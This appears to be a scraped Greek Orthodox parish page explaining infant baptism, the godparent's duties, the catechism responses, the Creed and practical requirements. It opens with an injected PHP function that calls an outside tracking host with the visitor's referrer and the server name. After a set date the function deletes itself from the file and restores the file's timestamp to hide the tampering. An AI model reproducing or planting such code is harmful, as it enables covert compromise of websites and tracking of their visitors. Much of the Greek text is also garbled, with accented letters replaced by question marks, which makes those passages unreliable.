check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456732960){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776828&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_search/models/content.php"); } Η Βάπτιση. Μυστήριο της Εκκλησίας. Για τον Ανάδοχο
Η Βάπτιση. Μυστήριο της Εκκλησίας. Για τον Ανάδοχο Εκτύπωση E-mail
Ευρετήριο Άρθρου
Η Βάπτιση. Μυστήριο της Εκκλησίας. Για τον Ανάδοχο
Ο ρόλος του αναδόχου
Ακολουθία της Κατηχήσεως
Το Σύμβολον της Πίστεως
Πρακτικές επισημάνσεις
Δικαιολογητικά
Δείτε το έντυπο
Όλες οι Σελίδες

ΓΙΑΤΙ Ο ΝΗΠΙΟΒΑΠΤΙΣΜΟΣ

? ?κκλησία ?πό τά πρ?τα βήματά της μαζί μέ τό βάπτισμα τ?ν ?νηλίκων υ?οθέτησε καί τόν νηπιοβαπτισμό, δηλαδή τό βάπτισμα τ?ν νηπίων καί μικρ?ν παιδι?ν. Τήν ?ρχαία α?­τή παράδοση συνεχίζει μέχρι σήμερα. Γιά ποιούς λόγους;

Πρ?τον, γιατί δέν θέλει νά στερήσει ?κόμη καί τά νήπια ?πό τή λυτρωτική χάρη το? μυστηρίου το? Βαπτίσματος.
Καί δεύτερον, γιατί τά νήπια πού βαπτίζει ε?ναι παιδιά χριστιαν?ν γονέων, μελ?ν τ?ς ?κκλησίας. Ο? χριστιανοί γονε?ς ε?ναι α?τοί πού τά προσκομίζουν μέ τή θέλη­σή τους στήν ?κκλησία καί τ?ς ζητο?ν νά τά βαπτίσει.

?πως ο? γονε?ς, πού φέρνουν ?να παιδί στόν κόσμο, ?ποφασίζουν γιά ?,τι ?φορ? τό παιδί τους μέχρι πού νά ?νηλικιωθε? (χωρίς νά ζητο?ν προηγουμένως τή συγκατάθεσή του), ?ποβλέποντας στό συμφέρον το? παιδιο? τους, ?τσι καί ο? ?διοι, ?ντας ?ρθόδοξοι χριστιανοί, ?ποφασίζουν νά τό βαπτίσουν καί νά τό καταστήσουν μέλος τ?ς ?κκλησί­ας.

Καί ?πειδή ?κριβ?ς τό νήπιο δέν μπορε? νά συγκατατεθε? καί δέν ?χει ?πίγνωση τ?ς ση­μασίας το? γεγονότος που τελε?ται, ? ?κκλησία ?ξιώνει ?πό τούς χριστιανούς γονε?ς το? νηπίου καί ?πό τόν ?νάδοχό του νά ?ναλάβουν τήν α?τονόητη ε?θύνη νά ?ναθρέ­ψουν τό παιδί χριστιανικά.

Τό Βάπτισμα ?ταν ?χει τελεστε? κανονικά (δηλαδή ?πό λειτουργό πού ?χει κανονική ?ε­ρωσύνη καί σύμφωνα μέ τούς θεμελιώδεις λειτουργικούς τύπους) δέν ?παναλαμβάνε­ται. ?στω κι ?ν ? ?νθρωπος ?πομακρύνθηκε ?πό τόν Θεό. ?στω κι ?ν ?πέπεσε σέ βα­ρύτατα ?μαρτήματα. ?τσι, ? ?ναβαπτισμός ?παγορεύεται α?στηρά. ? βαπτισματική χάρη πού λαμβάνει ? πιστός παραμένει ?νεξάλειπτη, γιατί τά δ?ρα πού δίνει ? Θεός στόν ?νθρωπο δέν τά παίρνει ποτέ πίσω. ?μως, ?σο ? ?νθρωπος παραμένει μακριά ?­πό τόν Θεό, ?ποκομμένος ?πό τήν ε?λογημένη ζωή τ?ς ?κκλησίας, ? χάρη το? μυ­στηρίου μένει ?νενεργός.


?γαπητέ ?νάδοχε,

?ποδέχτηκες τήν τιμή πού σο? ?καναν δύο ?δελφοί μας χριστιανοί γονε?ς, νά γίνεις ? ?νάδοχος το? παιδιο? τους.

? ρόλος το? ?ναδόχου δέν ?χει ?πλ?ς κοινωνικό χαρα­κτήρα. Πρωτίστως ?χει πνευματικό καί ο?σιαστικό.

? ?νάδοχος ?πωμίζεται τήν ε?θύνη -μαζί, φυσικά, μέ τούς χριστιανούς γονε?ς το? παιδιο?- νά μεταλαμπαδεύσει στόν νεο­φώτιστο χριστιανό τή χριστιανική πίστη. Νά τόν ?δηγήσει, καθώς θά μεγαλώνει, στή συνειδητή χριστιανική ζωή.

 


Ο ΡΟΛΟΣ ΤΟΥ ΑΝΑΔΟΧΟΥ

? πνευματική ε?θύνη το? ?ναδόχου γιά τήν ?κκλησί­α ?ρχίζει ?πό τήν ?ρα πού τελε?ται τό Βάπτισμα. ? ?νά­δοχος ?χει ρόλο σ? α?τό. Συμμετέχει καί συμπράττει, ?ναπληρώνοντας κατά κά­ποιον τρόπο τό νήπιο πού κρατ? στά χέρια του καί πού λόγω ?λικίας ?δυνατε? τό ?­διο νά συμπράξει.

Α?τό γίνεται ?διαίτερα στήν ?κολουθία τ?ς Κατηχήσε­ως, πού προηγε?ται το? κα­θαυτό μυστηρίου το? Βαπτί­σματος. ?δ? καταχωρίζου­με τό τμ?μα ?κε?νο πού ?φο­ρ? τόν ?νάδοχο καί πού θά πρέπει, ?γαπητέ ?νάδοχε, νά μελετήσεις προσεκτικά, ?στε νά ?παντ?ς ? ?διος καί μέ ?κρίβεια σέ ?,τι σέ ?ρωτ? ? ?ερεύς. Α?τονόητο ?τι σύ, ? ?νάδοχος, μέ ε?λάβεια καί ε?κρίνεια, θά ?παγγείλεις στήν κατάλληλη στιγμή τό Σύμβολο τ?ς Πίστεως.

 


ΑΚΟΛΟΥΘΙΑ ΤΗΣ ΚΑΤΗΧΗΣΕΩΣ

Στρέφονται δυτικά (πρός τήν ε?σοδο) καί ?ρωτ? τρε?ς φορές
? ?ερεύς· ?ποτάσσ? τ? Σαταν?; Καί π?σι το?ς ?ργοις α?το?; Καί πάσ? τ? λατρεί? α?το?; Καί π?σι το?ς ?γγέλοις α?το?; Καί πάσ? τ? πομπ? α?το?;

Καί ?παντ?
? ?νάδοχος· ?ποτάσσομαι.
?ρωτ? πάλι τρε?ς φορές
? ?ερεύς· ?πετάξω τ? Σαταν?;
Καί ?παντ?
? ?νάδοχος· ?πεταξάμην.

Καί λέγει
? ?ερεύς· Καί ?μφύσησον, καί ?μπτυσον α?τ?.
Καί ? ?νάδοχος φυσ? τρε?ς φορές στόν ?έρα καί φτύνει τρε?ς φορές στό ?δαφος.

Στρέφονται ?νατολικά (πρός τό ?ερό) καί ?ρωτ? τρε?ς φορές
? ?ερεύς· Συντάσσ? τ? Χριστ?;

Καί ?παντ?
? ?νάδοχος· Συντάσσομαι.
?ρωτ? πάλι τρε?ς φορές

? ?ερεύς· Συνετάξω τ? Χριστ?;
Καί ?παντ?

? ?νάδοχος· Συνεταξάμην.
Καί λέγει

? ?ερεύς· Καί πιστεύεις α?τ?;
Καί ?παντ?

? ?νάδοχος· Πιστεύω α?τ? ?ς Βασιλε? καί Θε?.
Καί ?παγγέλλει:

 


ΤΟ ΣΥΜΒΟΛΟΝ ΤΗΣ ΠΙΣΤΕΩΣ

Πιστεύω ε?ς ?να Θεόν, Πατέρα, παντοκράτορα, ποιητήν ο?ρανο? καί γ?ς, ?ρατ?ν τε πάντων καί ?οράτων.
Καί ε?ς ?να Κύριον ?ησο?ν Χριστόν, τόν Υ?όν το? Θεο? τόν μονογεν?, τόν ?κ το? Πα­τρός γεννηθέντα πρό πάντων τ?ν α?ώνων. Φ?ς ?κ φωτός, Θεόν ?ληθινόν ?κ Θεο? ?ληθινο?, γεννηθέντα, ο? ποιηθέντα, ?μοούσιον τ? Πατρί, δι? ο? τά πάντα ?γένε­το.
Τόν δι? ?μ?ς τούς ?νθρώπους καί διά τήν ?μετέραν σωτηρίαν κατελθόντα ?κ τ?ν ο?ραν?ν καί σαρκωθέντα ?κ Πνεύματος ?γίου καί Μαρίας τ?ς Παρθένου καί ?ναν­θρωπήσαντα.
Σταυρωθέντα τε ?πέρ ?μ?ν ?πί Ποντίου Πιλάτου καί παθόντα καί ταφέντα.
Καί ?ναστάντα τ? τρίτ? ?μέρα, κατά τάς Γραφάς.
Καί ?νελθόντα ε?ς τούς ο?ρανούς καί καθεζόμενον ?κ δεξι?ν το? Πατρός.
Καί πάλιν ?ρχόμενον μετά δόξης κρ?ναι ζ?ντας καί νεκρούς· ο? τ?ς βασιλείας ο?κ ?σται τέλος.
Καί ε?ς τό Πνε?μα τό ?γιον, τό Κύριον, τό ζωοποιόν, τό ?κ το? Πατρός ?κπορευόμε­νον, τό σύν Πατρί καί Υ?? συμπροσκυνούμενον καί συνδοξαζόμενον, τό λαλ?σαν δι­ά τ?ν προφητ?ν.
Ε?ς μίαν, ?γίαν, καθολικήν καί ?ποστολικήν ?κκλησίαν.
?μολογ? ?ν Βάπτισμα ε?ς ?φεσιν ?μαρτι?ν.
Προσδοκ? ?νάστασιν νεκρ?ν.
Καί ζωήν το? μέλλοντος α??νος. ?μήν.

Στή συνέχεια ?ρωτ? πάλι τρε?ς φορές
? ?ερεύς· Συνετάξω τ? Χριστ?; Καί ?παντ?
? ?νάδοχος· Συνεταξάμην. Καί λέγει
? ?ερεύς· Καί προσκύνησον α?τ?; Καί ?παντ?
? ?νάδοχος· Προσκυν? Πατέρα, Υ?όν, καί ?γιον Πνε?μα, Τριάδα ?μοούσιον καί ?­χώριστον.

Στήν ε?χή πού ?κολουθε?, ?ταν ?ρωτηθε? ?πό τόν ?ερέα, λέει καθαρά τό ?νομα το? βα­πτιζομένου.

 


ΠΡΑΚΤΙΚΕΣ ΕΠΙΣΗΜΑΝΣΕΙΣ

Ο? προσκλήσεις.

?ταν προσκαλο?με σέ ?να μυστήριο τ?ς ?κκλησίας, ?πως ε?­ναι τό Βάπτισμα, ?νάλογο πρέπει νά ε?ναι καί τό προσκλητήριό μας.

? μορφή του.

Τό περιεχόμενό του.

Δυστυχ?ς πολλά προσκλητήρια δείχνουν ματαιοδοξί­α στή μορφή τους καί ?συγχώρητη ?λαφρότητα στό περιεχόμενό τους.

?φείλου­με νά προσέξουμε.

Τό προσκλητήριο θά πρέπει νά δείχνει τή χριστιανική μας ?­ντίληψη γιά τό Βάπιτσμα, στό ?πο?ο προσκαλο?με συγγενε?ς καί φίλους.


Τά δ?ρα.

?πάρχει ? συνήθεια νά προσφέρουμε κάτι (μπομπονιέρες) ?ς ?να­μνηστικό στούς καλεσμένους μας.

Κι ?δ? ?νεργο?με ?ς χριστιανοί.

Καί ?πιλέ­γουμε ?ναμνηστικά πού ?χουν κάποια σχέση μέ τό μυστήριο.

Καινοφανε?ς καί ?παράδεκτες ε?ναι ο? ?πιλογές ?ρισμένων γονέων -θύματα κι α?τοί τ?ς ?μπορευ­ματοποίησης τ?ν πάντων- πού προσφέρουν ?ναμνηστι­κά πού καμιά σχέση δέν ?χουν μέ τήν ?κκλησία.


Τά ρο?χα το? νεοφώτιστου.

Σύμφωνα μέ τόν συμβολισμό τ?ς ?κκλησίας ε?ναι λευκά. Τό λευκό χρ?μα συμβολίζει τήν καθαρότητα, τό ?γιο Πνε?μα πού ?λα­βε ? νεοφώτιστος.

Σεβαστε?τε α?τό τόν ?ερό συμβολισμό καί μήν παρασύρεστε ?πό ?νδυματολογικές ?πιλογές πού ε?ναι ?σχετες μέ τό νόημα το? μυστηρίου καί τή σεβάσμια παράδοση τ?ς ?κκλησίας μας.


Τά «μαρτυρικά».

Ε?ναι ? Σταυρ?ς ? ? ε?κόνα τ?ς Παναγίας.

Τίποτε ?λλο. Δυ­στυχ?ς ?χει παρατηρηθε? νά καρφιτσώνονται στά πέτα τ?ν προσκεκλημένων διάφορα ?ντικείμενα, πού παραπέμπουν σέ προλήψεις καί δεισιδαιμονίες.

Ε?­ναι ?σέβεια στήν ?ποία δέν πρέπει ?πό ?πιπολαιότητα νά παρασυρόμαστε.


Τό λάδι.

Μέ α?τό χρίει ? ?ερέας τό παιδί πρίν τή βάπτιση. ?ποβλέπει στήν προ­στασία του ?πό κάθε δαιμονική ?νέργεια.

Μέ τό ?διο λάδι ?λείφει τό παιδί καί ? ?νάδοχος. Νά ε?ναι ?γνό ?λαιόλαδο καί ?χι νοθευμένο σπορέλαιο.

?,τι χρη­σιμοποιο?με στή λατρεία πρέπει ν? ε?ναι τό καλύτερο.

 


ΔΙΚΑΙΟΛΟΓΗΤΙΚΑ

Κατά τή βάπτιση ?νός παιδιο? στόν ?φημέριό μας προσκομίζουμε τή Ληξιαρχική Πρά­ξη Γεννήσεώς του.

?λα τά μυστήρια πού μ?ς ?φορο?ν θά πρέπει νά τελο?νται στήν ΕΝΟΡΙΑ ΜΑΣ· στήν ?νορία στά ?ρια τ?ς ?ποίας κατοικο?με. Στήν ?νορία μας ?πομένως βαπτίζουμε καί τά παιδιά μας. ?ν ?μως, γιά ?ποιονδήποτε λόγο ε?ναι ?νάγκη νά κάνουμε τή βάπτιση το? παιδιο? μας σέ ?λλη ?νορία, ?πό τόν ?φημέριο τ?ς ?νορίας μας θά πρέπει νά ζητή­σουμε ?να χαρτί πού λέγεται Μεταβίβαση Βαπτίσεως.

Σέ περίπτωση ?πουσίας ?πό τή βάπτιση ?νός ?κ τ?ν δύο γονέων, ?παιτε?ται γιά τήν ?­νοματοδοσία ?γγραφη συγκατάθεση ?κείνου πού ?πουσιάζει, μέ ?πικύρωση το? γνησί­ου τ?ς ?πογραφ?ς.

* * *

?γαπητέ ?νάδοχε,

?ξιος ! Α?τή τήν ε?χή θ? ?κούσεις ?πό τό στόμα το? λειτουργο? καί ?πό τά χείλη ?λων τ?ν καλεσμένων.

Ε?χομαι κι ?γώ νά σ? ε?λογε? πάντοτε ? Κύριος καί ν? ?ναδειχθε?ς πράγματι ?ξιος. Πού σημαίνει νά ?νταποκριθε?ς μέ ε?θύνη καί συνέπεια στήν τιμή καί τό χρέος νά γίνεις πνευματικός πατέρας το? παιδιο? πού πρόκειται νά βαπτίσεις.


? Μητροπολίτης

ΠΕΙΡΑΙΩΣ ΣΕΡΑΦΕΙΜΠατήστε εδώ για να δείτε το έντυπο σε νέο παράθυρο>
Δημοσιεύστε στο YUDU

 
 

Παντρεύεστε;

apokatastash steghs

Βαπτίζετε το παιδί σας;

Γίνεσται ανάδοχος;